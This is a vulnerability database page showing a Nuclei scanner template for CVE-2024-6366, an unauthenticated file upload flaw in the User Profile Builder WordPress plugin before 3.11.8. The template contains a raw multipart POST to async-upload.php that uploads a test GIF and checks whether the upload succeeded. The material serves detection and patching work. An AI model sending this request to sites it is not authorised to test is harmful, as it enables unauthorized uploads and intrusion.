Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

User Profile Builder < 3.11.8 - File Upload

🗓️ 01 Jun 2026 05:38:37Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 131 Views

User Profile Builder < 3.11.8 - File Upload vulnerability in WordPres

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for Unrestricted Upload of File with Dangerous Type in Cozmoslabs Profile_Builder
2 Feb 202515:37
githubexploit
Circl		CVE-2024-6366
29 Jul 202408:45
circl
CNNVD		WordPress plugin User Profile Builder 安全漏洞
29 Jul 202400:00
cnnvd
CVE		CVE-2024-6366
29 Jul 202406:00
cve
Cvelist		CVE-2024-6366 User Profile Builder < 3.11.8 - Unauthenticated Media Upload
29 Jul 202406:00
cvelist
NVD		CVE-2024-6366
29 Jul 202406:15
nvd
Patchstack		WordPress User Profile Builder plugin < 3.11.8 - Unauthenticated Media Upload vulnerability
29 Jul 202406:36
patchstack
Patchstack		WordPress Profile Builder Plugin < 3.11.8 is vulnerable to Broken Access Control
29 Jul 202400:00
patchstack
Positive Technologies		PT-2024-37570 · WordPress · User Profile Builder
29 Jul 202400:00
ptsecurity
RedhatCVE		CVE-2024-6366
23 May 202508:01
redhatcve
Rows per page
id: CVE-2024-6366

info:
  name: User Profile Builder < 3.11.8 - File Upload
  author: s4e-io
  severity: high
  description: |
    The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.
  impact: |
    Unauthenticated attackers can upload arbitrary media files through the async upload functionality, potentially uploading malicious files to the server.
  remediation: |
    Update User Profile Builder plugin to version 3.11.8 or later to address the unauthorized file upload vulnerability.
  reference:
    - https://wpscan.com/vulnerability/5b90cbdd-52cc-4e7b-bf39-bea0dd59e19e/
    - https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-6366
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6366
  classification:
    cve-id: CVE-2024-6366
    epss-score: 0.91317
    epss-percentile: 0.99672
  metadata:
    vendor: cozmoslabs
    product: user-profile-builder
    framework: wordpress
    publicwww-query: "/wp-content/plugins/profile-builder"
  tags: cve,cve2024,wpscan,file-upload,instrusive,wp-plugin,wordpress,wp,profile-builder,vuln

flow: http(1) && http(2)

variables:
  filename: "{{to_lower(rand_text_alpha(12))}}"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/plugins/profile-builder")'
        internal: true

  - raw:
      - |
        POST /wp-admin/async-upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="wppb_upload"

        true
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="meta_name"

        {{filename}}.gif
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="_wpnonce"

        e8
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="action"

        upload-attachment
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="async-upload"; filename="{{filename}}.gif"
        Content-Type: image/jpeg

        GIF89a

        ------WebKitFormBoundary7MA4YWxkTrZu0gW--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '"id"'
          - '"uploadedTo"'
        condition: and

      - type: word
        part: header
        words:
          - "Content-Type: text/plain"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100dcd930560e03bea1b272d0b5872cd59481bf0d4ce08219718bb7027742ce0193022068f162d365bc5005c56dfc3545eb0872e9fef6b8f270c3493cb49ee18faca163:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.19.1
EPSS0.91317
SSVC
cvewpscanfile uploadwordpress pluginintrusion detectionprofile builder
131